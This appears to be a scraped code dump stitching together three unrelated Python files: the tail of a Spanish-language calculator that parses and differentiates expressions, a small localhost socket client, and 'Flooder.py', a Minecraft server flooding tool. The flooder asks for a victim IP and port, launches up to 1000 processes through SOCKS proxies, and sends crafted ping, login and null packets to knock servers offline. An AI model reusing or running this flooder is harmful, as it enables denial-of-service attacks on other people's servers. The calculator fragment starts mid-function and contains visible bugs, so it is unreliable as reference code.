string=string[1:]
else:
sig= 1.0
string=string.strip()
else:
sig=1.0
if parentesis:
if ('(' in string[0]) and (')' in string[-1]):
string=string[1:-1]
string=string.strip()
monomio=1
parentesis=1
string=string.strip()
for x in range(0,len(string),1):
if string[x]=='(':
nivel += 1
if string[x]==')':
nivel -= 1
if string[x] in '-+' and nivel==0:
if x>0:
monomio=0
if string[x] in '-+*/%' and nivel==0:
if x>0:
parentesis=0
if monomio:
if string[0] in '+' and nivel==0:
sig= 1.0*sig
string=string[1:]
elif string[0] in '-' and nivel==0:
sig=-1.0*sig
string=string[1:]
string=string.strip()
if parentesis:
if ('(' in string[0]) and (')' in string[-1]):
string=string[1:-1]
string=string.strip()
for x in range(0,len(string),1):
if string[x]=='(':
nivel += 1
if string[x]==')':
nivel -= 1
if string[x] in '-+' and nivel==0:
if x>0:
esSuma=1
signoSuma += [x]
if not monomio:
operador=0
if (string[x] == '*') and ( '*' != string[x+1]) and ( '*' != string[x-1]) and nivel==0:
esProducto=1
signoProducto += [x]
operador=0
if string[x] in '/' and nivel==0:
esDivision=1
signoDivision += [x]
operador=0
if (string[x] == '*') and ( '*' == string[x+1]) and nivel==0:
esExponente=1
signoExponente += [x]
operador=0
if (string[x] == '%') and nivel==0:
esResto=1
signoResto += [x]
operador=0
if operador:
x=0
coincide=[op for op in operadores if op in (string if len(op)<len(string) else '')]
if coincide:
print(coincide)
comas=[0]
for x in range(0,len(string),1):
if string[x]=='(':
nivel += 1
if string[x]==')':
nivel -= 1
if string[x] in ',' and nivel==0:
comas += [x]
if string[:len('w')] in 'w' and nivel==0:
pass
if string[:len('dy')] in 'dy' and nivel==0:
pass
if string[:len('log')] in 'log' and nivel==0:
#math.log(x,base)
print('log',string)
parteReal=strToMath(string=string[len('log'):comas[1]],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
if len(comas)==1:
base=strToMath(string='10.0',dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
else:
base=strToMath(string=string[comas[1]+1:-1],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def logaritmoNatural(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,parteReal=parteReal,base=base):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
numerador='(('+parteReal(x,p=p,dy=1,decimales=decimales,mostrarSigno=1)+'/'+parteReal(x,p=p,dy=0,decimales=decimales,mostrarSigno=1)+')-('+parteReal(x,p=p,dy=1,decimales=decimales,mostrarSigno=1)+'/'+parteReal(x,p=p,dy=0,decimales=decimales,mostrarSigno=1)+'))'
return s+'('+numerador+'/'+parteReal(x,p=p,dy=0,decimales=decimales,mostrarSigno=1)+')'
else:
numerador=signo*((parteReal(x,p=p,dy=1,decimales=decimales,mostrarSigno=1)/parteReal(x,p=p,dy=0,decimales=decimales,mostrarSigno=1))-(base(x,p=p,dy=1,decimales=decimales,mostrarSigno=1)/base(x,p=p,dy=0,decimales=decimales,mostrarSigno=1)))
return numerador/((math.log(base(x,p=p,dy=1,decimales=decimales,mostrarSigno=1)))**2)
else:
if p:
return s+'ln('+parteReal(x,p=p,decimales=decimales,mostrarSigno=1)+','+base(x,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*math.log(parteReal(x),base(x))
return logaritmoNatural
if string[:len('ln')] in 'ln' and nivel==0:
#math.log(x,base)
print('ln',string)
parteReal=strToMath(string=string[len('ln'):],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def logaritmoNatural(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,parteReal=parteReal):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return s+'('+parteReal(x,p=p,dy=1,decimales=decimales,mostrarSigno=1)+'/'+parteReal(x,p=p,dy=0,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*(parteReal(x,p=p,dy=1,decimales=decimales,mostrarSigno=1)/parteReal(x,p=p,dy=0,decimales=decimales,mostrarSigno=1))
else:
if p:
return s+'ln('+parteReal(x,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*math.log(parteReal(x))
return logaritmoNatural
if string[:len('abs')] in 'abs' and nivel==0:
#math.fabs(-66.43)
print('abs',string)
valor=strToMath(string=string[len(''):],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def valorAbsoluto(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,u=valor):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return s+'(('+valor(x,p=p,dy=0,decimales=decimales,mostrarSigno=1)+'/abs('+valor(x,p=p,dy=0,decimales=decimales,mostrarSigno=1)+'))*('+valor(x,p=p,dy=1,decimales=decimales,mostrarSigno=1)+'))'
else:
return signo*((valor(x,p=p,dy=0,decimales=decimales)/math.fabs(valor(x,p=p,dy=0,decimales=decimales)))*valor(x,p=p,dy=1,decimales=decimales))
else:
if p:
return s+'abs('+valor(x,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*math.fabs(valor(x))
return valorAbsoluto
if string[:len('tg')] in 'tg' and nivel==0:
#math.tan()
print('tg',string)
radian=strToMath(string=string[len('tg'):],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def tangente(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,radian=radian):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return s+'((1+tg('+radian(x,dy=0,p=p,decimales=decimales,mostrarSigno=1)+')**2)*('+radian(x,dy=dy,p=p,decimales=decimales,mostrarSigno=1)+'))'
else:
return signo*(1+math.tan(radian(x))**2)*radian(x,dy=dy)
else:
if p:
return s+'tg('+radian(x,dy=dy,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*math.tan(radian(x))
return tangente
if string[:len('sen')] in 'sen' and nivel==0:
#math.sin()
print('sen',string)
radian=strToMath(string=string[len('sen'):],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def seno(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,radian=radian):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return s+'(cos('+radian(x,dy=0,p=p,decimales=decimales,mostrarSigno=1)+')*('+radian(x,dy=dy,p=p,decimales=decimales,mostrarSigno=1)+'))'
else:
return signo*math.cos(radian(x))*radian(x,dy=dy)
else:
if p:
return s+'sen('+radian(x,dy=dy,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*math.sin(radian(x))
return seno
if string[:len('cos')] in 'cos' and nivel==0:
#math.cos()
print('cos',string)
radian=strToMath(string=string[len('cos'):],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def coseno(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,radian=radian):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
s=('-' if signo>0.0 else '+') if mostrarSigno else ''
return +s+'(sen('+radian(x,dy=0,p=p,decimales=decimales,mostrarSigno=1)+')*('+radian(x,dy=dy,p=p,decimales=decimales,mostrarSigno=1)+'))'
else:
return -1*signo*math.sin(radian(x))*radian(x,dy=dy,p=p,decimales=decimales,mostrarSigno=1)
else:
if p:
return s+'cos('+radian(x,dy=dy,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*math.cos(radian(x))
return coseno
if string[:len('arcsen')] in 'arcsen' and nivel==0:
#math.asin()
pass
if string[:len('arccos')] in 'arccos' and nivel==0:
#math.acos()
pass
if string[:len('arctg')] in 'arctg' and nivel==0:
#math.atan()
pass
if string[:len('signo')] in 'signo' and nivel==0:
pass
if string[:len('entero')] in 'entero' and nivel==0:
pass
if string[:len('decimal')] in 'decimal' and nivel==0:
pass
if string[:len('round')] in 'round' and nivel==0:
print('round',string)
redondeo=strToMath(string=string[len('round'):],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def redondear(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,redondeo=redondeo):
if mostrarSigno:
s='+' if signo>=0.0 else '-'
else:
s=''
if dy:
if p:
return '0.0'
else:
return 0.0
else:
if p:
return s+'round('+defecto(x,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*math.round(defecto(x))
return redondear
if string[:len('floor')] in 'floor' and nivel==0:
print('floor',string)
defecto=strToMath(string=string[len('floor'):],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def redondearHaciaAbajo(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,defecto=defecto):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return '0.0'
else:
return 0.0
else:
if p:
return s+'floor('+defecto(x,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*math.floor(defecto(x))
return redondearHaciaAbajo
if string[:len('ceil')] in 'ceil' and nivel==0:
print('ceil',string)
exceso=strToMath(string=string[len('ceil'):],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def redondearHaciaArriba(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0,exceso=exceso):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return '0.0'
else:
return 0.0
else:
if p:
return s+'ceil('+exceso(x,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*math.ceil(exceso(x))
return redondearHaciaArriba
else:
esConstante=1
"""
if string[:len('')] in '' and nivel==0:
print('',string)
=strToMath(string=string[len(''):],dy=dy,p=p,decimales=decimales,v=v)
def op(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0):
#f(x,dy=dy,p=p,decimales=decimales,mostrarSigno=0)
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return s
else:
ret =
return signo*ret
else:
if p:
return s
else:
return signo*
return op
"""
else:
c=None
if string in constantes:
c=constantes[string]
elif sum([1 for l in string if ((48<=ord(l) and ord(l)<=57) or (ord(l)==46))])==len(string):
c=float(string)
if c:
print('constante',c)
def constante(x,dy=dy,p=p,c=c,decimales=decimales,signo=sig,mostrarSigno=0):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return '0.'+'0'*decimales
else:
return 0
else:
if p:
return s+str(c)[:decimales]
else:
return c*signo
return constante
if string==variable:
print('variable',string,sig)
def variable(x,dy=dy,p=p,decimales=decimales,signo=sig,mostrarSigno=0):
if mostrarSigno:
s='+' if signo>=0.0 else '-'
else:
s=''
if dy:
if p:
return '1.0'
else:
return 1.0
else:
if p:
return s+str(x)[:decimales]
else:
return x*signo
return variable
else:
#parentecis,exponente/radicales,multiplicacion/division,suma/resta
if esSuma:
print('suma',string,signoSuma)
if len(signoSuma)==1:
sumandos=[strToMath(string=string[1:],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)]
else:
sumandos=[]
for sumando in range(0,len(signoSuma)-1,1):
sumandos+=[strToMath(string=string[signoSuma[sumando]:signoSuma[sumando+1]],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)]
sumandos+=[strToMath(string=string[signoSuma[-1]:],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)]
def suma(x,dy=dy,p=p,decimales=decimales,sumandos=sumandos,signo=sig,mostrarSigno=0):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
ret = s+'('
for sumando in sumandos:
ret += ' '+sumando(x,p=p,dy=dy,decimales=decimales,mostrarSigno=1)
return ret+')'
else:
return signo*sum([sumando(x,dy=dy) for sumando in sumandos])
else:
if p:
ret = s+'('
for sumando in sumandos:
ret += ' '+sumando(x,p=p,decimales=decimales,mostrarSigno=1)
return ret+')'
else:
ret = 0.0
for sumando in sumandos:
ret += sumando(x)
return signo*ret
return suma
elif esDivision:
print('division',string,signoDivision)
signoDivision+=[]
numerador=strToMath(string=string[0:signoDivision[1]],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
denominador=strToMath(string=string[signoDivision[1]+1:],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def division(x,dy=dy,p=p,decimales=decimales,numerador=numerador,denominador=denominador,signo=sig,mostrarSigno=0):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return s+'(('+numerador(x,p=p,dy=1,decimales=decimales)+')*('+denominador(x,p=p,dy=0,decimales=decimales)+')-('+numerador(x,p=p,dy=0,decimales=decimales)+')*('+denominador(x,p=p,dy=1,decimales=decimales)+'))/(('+denominador(x,p=p,dy=0,decimales=decimales)+')**2)'
else:
return signo*((numerador(x,p=p,dy=1,decimales=decimales)*denominador(x,p=p,dy=0,decimales=decimales))-(numerador(x,p=p,dy=0,decimales=decimales)*denominador(x,p=p,dy=1,decimales=decimales)))/(denominador(x,p=p,dy=0,decimales=decimales)**2)
else:
if p:
return s+'('+numerador(x,p=p,dy=0,decimales=decimales)+'/'+denominador(x,p=p,dy=0,decimales=decimales)+')'
else:
return signo*numerador(x,dy=0,decimales=decimales)/denominador(x,dy=0,decimales=decimales)
return division
elif esResto:
print('resto',string,signoResto)
signoResto+=[]
numerador=strToMath(string=string[0:signoResto[1]],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
denominador=strToMath(string=string[signoResto[1]+1:],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def restoPorDefecto(x,dy=dy,p=p,decimales=decimales,numerador=numerador,denominador=denominador,signo=sig,mostrarSigno=0):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return ''
else:
return None
else:
if p:
return s+'('+numerador(x,p=p,dy=0,decimales=decimales)+'%'+denominador(x,p=p,dy=0,decimales=decimales)+')'
else:
return signo*numerador(x,dy=0,decimales=decimales)%denominador(x,dy=0,decimales=decimales)
return restoPorDefecto
elif esProducto:
print('producto',string,signoProducto)
factores=[]
for factor in range(0,len(signoProducto)-1,1):
factores+=[strToMath(string=string[signoProducto[factor]+(1 if 0<factor else 0 ):signoProducto[factor+1]],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)]
factores+=[strToMath(string=string[signoProducto[-1]+1:],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)]
def producto(x,dy=dy,p=p,decimales=decimales,signo=sig,factores=factores,mostrarSigno=0):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
ret=s+'('
factor='('
for derivar in range(0,len(factores),1):
factor=factores[derivar](x,dy=1,p=p,decimales=decimales)
for escalar in range(0,len(factores),1):
if not (derivar == escalar):
factor += '*'+factores[escalar](x,dy=0,p=p,decimales=decimales)
ret += factor+')+'
return ret[:-1]+')'
else:
ret=0.0
factor=1.0
for derivar in range(0,len(factores),1):
factor=factores[derivar](x,dy=1,p=p,decimales=decimales)
for escalar in range(0,len(factores),1):
if not (derivar == escalar):
factor*=factores[escalar](x,dy=0,p=p,decimales=decimales)
ret += factor
return signo*ret
else:
if p:
ret = s+'('+factores[0](x,dy=0,p=p,decimales=decimales)
for factor in factores[1:]:
ret += '*'+factor(x,dy=0,p=p,decimales=decimales)
return ret+')'
else:
ret = 1.0
for factor in factores:
ret *= factor(x,dy=0,p=0)
return signo*ret
return producto
elif esExponente:
print('exponente',string,signoExponente)
signoExponente+=[]
base=strToMath(string=string[0:signoExponente[1]],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
exponente=strToMath(string=string[signoExponente[1]+2:],dy=dy,p=p,decimales=decimales,v=v,composicion=composicion)
def potencia(x,dy=dy,p=p,decimales=decimales,signo=sig,base=base,exponente=exponente,mostrarSigno=0):
if mostrarSigno:
s='+' if signo>0.0 else '-'
else:
s=''
if dy:
if p:
return s+'((('+exponente(x,dy=0,p=p,decimales=decimales)+'*('+base(x,dy=0,p=p,decimales=decimales)+'**('+exponente(x,dy=0,p=p,decimales=decimales)+'-1))*'+base(x,dy=1,p=p,decimales=decimales)+') + ('+exponente(x,dy=1,p=p,decimales=decimales)+'*('+base(x,dy=0,p=p,decimales=decimales)+'**'+exponente(x,dy=0,p=p,decimales=decimales)+')*ln('+base(x,dy=0,p=p,decimales=decimales)+'))))'
else:
ret = exponente(x,dy=0,p=p,decimales=decimales)*(base(x,dy=0,p=p,decimales=decimales)**(exponente(x,dy=0,p=p,decimales=decimales)-1))*base(x,dy=1,p=p,decimales=decimales) + exponente(x,dy=1,p=p,decimales=decimales)*(base(x,dy=0,p=p,decimales=decimales)**exponente(x,dy=0,p=p,decimales=decimales))*math.log(base(x,dy=0,p=p,decimales=decimales))
return signo*ret
else:
if p:
return s+base(x,p=p,decimales=decimales)+'**('+exponente(x,p=p,decimales=decimales,mostrarSigno=1)+')'
else:
return signo*base(x)**exponente(x)
return potencia
#pruebaTreeview()
#ventanaPersonalizada()
#caja()
def g(x):
return (x*math.e**x)/(math.e**x+math.e**(-x))
f=calculadora()
f.setEcuacion('senhP',string='sen(360/x)+x',variable='x',constantes={'alto':80.0})
f.setEcuacion('coshP',string='senhP(x+bajo)/cos(x)',variable='x',constantes={'bajo':10.0})
print(f.ec['senhP'](3,p=1,dy=1),'=',f.ec['senhP'](3,p=0,dy=1))
print(f.ec['coshP'](3,p=1,dy=1),'=',f.ec['coshP'](3,p=0,dy=1))
#print('(x*e**x)/(e**x+e**(-x))','=',g(3))
|
facs_client.py
|
import socket
import threading
import logging
logger = logging.getLogger(__name__)
LOCAL_BIND_ADDR = ('127.0.0.1', 8000)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.connect(LOCAL_BIND_ADDR)
logger.warning('[NEW CONNECTION] Connected to the server')
def send_data():
threading.Timer(5.0, send_data).start()
data = "Message from client"
server.sendall(data.encode())
def receive():
while True:
try:
data_from_server = server.recv(1024)
if not data_from_server:
raise OSError('Socket error!')
logger.warning('<SERVER> %s', data_from_server.decode())
except (socket.error, IOError, OSError):
logger.warning('[DISCONNECT] Connection closed\n')
server.close()
break
receive_thread = threading.Thread(target=receive)
receive_thread.start()
send_data()
|
Flooder.py
|
#!/usr/bin/python3
import requests, string, socket, socks, time, random, threading, sys, datetime, argparse, os, multiprocessing
mode = "Flood"
parser = argparse.ArgumentParser(description=("PacketFlooder"))
parser.add_argument("-host", type=str,
help="• Victim [HOST]")
parser.add_argument("-p", "--port", type=int,
default="25565", help="• Victim [PORT]")
parser.add_argument("-m", "--method", type=int,
default="2", help="• Attack Method")
parser.add_argument("-threads", "--threads", type=int,
default="1000", help="• Threads")
parser.add_argument("-type", "--type", type=int,
default="4", help="• Type [SOCKS]")
parser.add_argument("-amp", "--amplification", type=str,
default="100", help="• Amplification")
#parser.add_argument("-print", "--print", type=str,
# default="true", help="• Print Optimization")
parser.add_argument("-pFile", "--proxiesFile", type=str,
default="socks4.txt", help="• Proxies File")
parser.add_argument("-noP", "--noProxy", type=str,
default="false", help="• Attack without proxies [Faster]")
args = parser.parse_args()
printOption = "false"
def build_threads(mode,thread_num,event,socks_type):
if mode == "Flood":
if __name__ == '__main__':
processes = []
for i in range(thread_num):
p = multiprocessing.Process(target = flood,args=(event,socks_type,))
processes.append(p)
p.start()
def flood(event,socks_type):
if (opcion == 2):
proxy = random.choice(proxies).strip().split(":")
nicks = random.choice(lista)
Caracteres = len(nicks)
Tamano = bytes([Caracteres + 2])
Zero = b'\x00'
NickL = bytes([Caracteres])
encodeNick = nicks[:-1].encode(encoding="utf-8")
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if socks_type == 6:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(ip), int(port)))
try:
for _ in range(amplification):
s.send(Mensaje + Tamano + Zero + NickL + encodeNick)
except:
s.close()
#print ("[»] " + str(Method) + " | Proxy - " +str(proxy[0])+":"+str(proxy[1])) // I wouldn't activate it, it spams too much!
except:
s.close()
if (opcion == 1):
proxy = random.choice(proxies).strip().split(":")
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if socks_type == 6:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(ip), int(port)))
try:
for _ in range(amplification):
s.send(Mensaje)
except:
s.close()
#print ("[»] " + str(Method) + " | Proxy - " +str(proxy[0])+":"+str(proxy[1])) // I wouldn't activate it, it spams too much!
except:
s.close()
def opciones():
global ip
global port
global proxies
global amplification
global socks_type
global choice
global opcion
global thread_num
global Test
global Test2
global lista
global Mensaje
global Method
color = '\33[31m'
green = '\33[32m'
white = '\33[37m'
print(color + """
▄▄▄▄ ▓█████▄▄▄█████▓ ▄▄▄ ▄▄▄█████▓ ▒█████ ▒█████ ██▓
▓█████▄ ▓█ ▀▓ ██▒ ▓▒▒████▄ ▓ ██▒ ▓▒▒██▒ ██▒▒██▒ ██▒▓██▒
▒██▒ ▄██▒███ ▒ ▓██░ ▒░▒██ ▀█▄ ▒ ▓██░ ▒░▒██░ ██▒▒██░ ██▒▒██░
▒██░█▀ ▒▓█ ▄░ ▓██▓ ░ ░██▄▄▄▄██░ ▓██▓ ░ ▒██ ██░▒██ ██░▒██░
░▓█ ▀█▓░▒████▒ ▒██▒ ░ ▓█ ▓██▒ ▒██▒ ░ ░ ████▓▒░░ ████▓▒░░██████▒
░▒▓███▀▒░░ ▒░ ░ ▒ ░░ ▒▒ ▓▒█░ ▒ ░░ ░ ▒░▒░▒░ ░ ▒░▒░▒░ ░ ▒░▓ ░
▒░▒ ░ ░ ░ ░ ░ ▒ ▒▒ ░ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ░ ▒ ░
░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░
""")
opcion = int(input(green + """
┌──────────────────────────────────────────────┐
│ 1. DemonShredder - Sends PING packets │
│ 2. HadesDestroyer - Sends Connection Packets │
│ 3. NullPing - Sends invalid packets │
└──────────────────────────────────────────────┘
💀 » Choose your method: """))
print("")
print(white + "")
ip = str(input("» IP: "))
if ip == "":
print("» Please enter correct host or ip")
sys.exit(1)
if mode == "flood":
pass
r1 = os.popen("curl -s https://api.mcsrvstat.us/2/" + ip).read()
start1 = ("\"ip\":\"")
end1 = "\","
ip = (r1.split(start1))[1].split(end1)[0]
encodeIP = ip.encode(encoding="utf-8", errors="strict")
lista = open("Nicks.txt").readlines()
PingSlapper = b'\xfe\x01\xfa\x00\x0b\x00M\x00C\x00|\x00P\x00i\x00n\x00g\x00H\x00o\x00s\x00t\x00#\x7f\x00\x0e\x001\x004\x007\x00.\x001\x003\x005\x00.\x003\x001\x00.\x001\x007\x005\x00\x00\x03\xe7'
CPSFlooder = b'\x0f\x00/\tlocalhostc\xdf\x02'
#Part2 = b'\x00/\tlocalhostc\xdf\x02\r\x00\x0bq\x0b/\xfd\x00\xa1#\xfd\xa1v\xfd'
NullPing = b'\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01AttackByLPBots'
if (opcion == 1):
Mensaje = PingSlapper
Method = "DemonShredder"
if (opcion == 2):
Mensaje = CPSFlooder
Method = "HadesDestroyer"
if (opcion == 3):
Mensaje = NullPing
Method = "NullPing"
print("")
port = str(input("» Puerto: "))
if port == '':
port = int(25565)
print("» Default choose port 25565\r\n» Port 25565 was chosen")
else:
port = int(port)
thread_num = int(input("» Threads [default: 1000]: "))
if thread_num == "":
thread_num = int(1000)
choice = ""
while choice == "":
choice = str(input("» Socks 4 or 5? [default: 4]: ")).strip()
if choice == "5":
choice = "5"
if choice != "4" and choice != "5":
print("[»] Error TYPE_INVALID try again")
choice = ""
if choice == "4":
socks_type = 4
else:
socks_type = 5
if choice == "4":
out_file = str("socks4.txt")
if out_file == '':
out_file = str("socks4.txt")
else:
out_file = str(out_file)
proxies = open(out_file).readlines()
elif choice == "5":
out_file = ("socks5.txt")
if out_file == '':
out_file = str("socks4.txt")
else:
out_file = "socks4.txt"
proxies = open(out_file).readlines()
print ("» TYPE %s // Proxies: %s" %(choice,len(proxies)))
amplification = str(input("» Loop (How many requests per thread):"))
if amplification == "":
amplification = int(100)
else:
amplification = int(amplification)
